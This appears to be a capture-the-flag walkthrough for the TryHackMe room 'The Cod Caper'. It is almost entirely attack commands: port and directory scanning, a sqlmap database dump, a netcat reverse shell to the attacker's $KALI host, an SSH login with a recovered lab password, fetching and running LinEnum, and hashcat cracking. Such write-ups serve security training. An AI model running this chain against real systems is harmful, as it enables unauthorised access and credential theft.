The Cod Caper
Room Link: https://tryhackme.com/room/thecodcaper
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
No other ports found.
Kali
nmap -sV -sT -O -p 1-65535 $VICTIMTCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
SQL
Kali
sqlmap -u http://$VICTIM/administrator.php --forms --dump

Method 1: nc Reverse shell:
Kali
nc -lvnp 1337Browser
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc $KALI 1337 >/tmp/fGet autocomplete
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
Method 2: Hidden passwords:
Browser
find / -user www-data 2>/dev/null
cat /var/hidden/pass
Kali
ssh pingu@$VICTIM
Password: pinguapingu
Enumeration
Download LinEnum Script
Kali
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
python2 -m SimpleHTTPServer 81Victim
cd /tmp/
wget http://$KALI:81/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
Kali
hashcat -m 1800 -a 0 hash /usr/share/wordlists/rockyou.txt
hashcat -m 1800 -a 0 hash /usr/share/wordlists/rockyou.txt --show
Last updated